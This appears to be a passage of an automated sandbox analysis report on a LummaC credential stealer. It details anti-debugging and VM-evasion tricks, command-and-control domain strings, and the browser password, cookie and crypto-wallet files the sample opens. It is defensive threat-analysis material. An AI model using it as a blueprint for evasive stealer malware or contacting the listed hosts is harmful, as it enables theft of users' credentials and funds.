                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57709D4 second address: 5770A12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F664452DADEh 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F664452DAE7h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770A12 second address: 5770A1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770A1A second address: 5770A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test esi, esi 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d jmp 00007F664452DAE6h 0x00000012 popad 0x00000013 je 00007F66B49CB44Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F664452DADDh 0x00000022 jmp 00007F664452DADBh 0x00000027 popfd 0x00000028 mov bl, ch 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770A64 second address: 5770AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75C7459Ch], 05h 0x00000010 pushad 0x00000011 call 00007F6644F246EEh 0x00000016 mov bx, si 0x00000019 pop ecx 0x0000001a pushad 0x0000001b mov esi, edi 0x0000001d mov edi, 205D98ACh 0x00000022 popad 0x00000023 popad 0x00000024 je 00007F66B53DA0DFh 0x0000002a pushad 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop esi 0x0000002e push ebx 0x0000002f pop esi 0x00000030 popad 0x00000031 mov edx, 1134ECBAh 0x00000036 popad 0x00000037 push ebp 0x00000038 pushad 0x00000039 popad 0x0000003a mov dword ptr [esp], esi 0x0000003d pushad 0x0000003e mov edx, ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F6644F246ECh 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770ADE second address: 5770AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770AE2 second address: 5770B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6644F246F2h 0x0000000c sub ecx, 4096C788h 0x00000012 jmp 00007F6644F246EBh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a jmp 00007F6644F246F6h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F6644F246ECh 0x00000028 pop eax 0x00000029 movsx edi, si 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770BE2 second address: 5770BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770BFD second address: 5770C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770C02 second address: 5770C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F664452DAE5h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, 3553F96Eh 0x00000016 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSpecial instruction interceptor: First address: EB7C42 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSpecial instruction interceptor: First address: 10698E2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSpecial instruction interceptor: First address: 1093E3C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSpecial instruction interceptor: First address: 107058E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSpecial instruction interceptor: First address: 10F1E55 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe TID: 7324Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe TID: 7344Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe TID: 7432Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe TID: 7616Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084934951.0000000001046000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: gJkNLYV0ax.exe, gJkNLYV0ax.exe, 00000000.00000002.2085682261.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2084563810.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085484486.00000000019A8000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027466840.00000000019F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084934951.0000000001046000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: SICE
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: rapeflowwj.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crosshuaht.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sustainskelet.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: aspecteirs.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: energyaffai.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacebudi.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: discokeyus.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: grannyejh.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sweepyribs.lat
                Source: gJkNLYV0ax.exe, 00000000.00000002.2084934951.0000000001046000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: gJkNLYV0ax.exe, 00000000.00000003.2026127813.0000000001A68000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027537679.0000000001A68000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2025752485.0000000006081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: gJkNLYV0ax.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: gJkNLYV0ax.exeString found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: gJkNLYV0ax.exeString found in binary or memory: Wallets/ElectronCash
                Source: gJkNLYV0ax.exeString found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: gJkNLYV0ax.exeString found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: gJkNLYV0ax.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: gJkNLYV0ax.exeString found in binary or memory: Wallets/Exodus
                Source: gJkNLYV0ax.exeString found in binary or memory: Wallets/Ethereum
                Source: gJkNLYV0ax.exeString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: gJkNLYV0ax.exe, 00000000.00000003.2027466840.0000000001A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
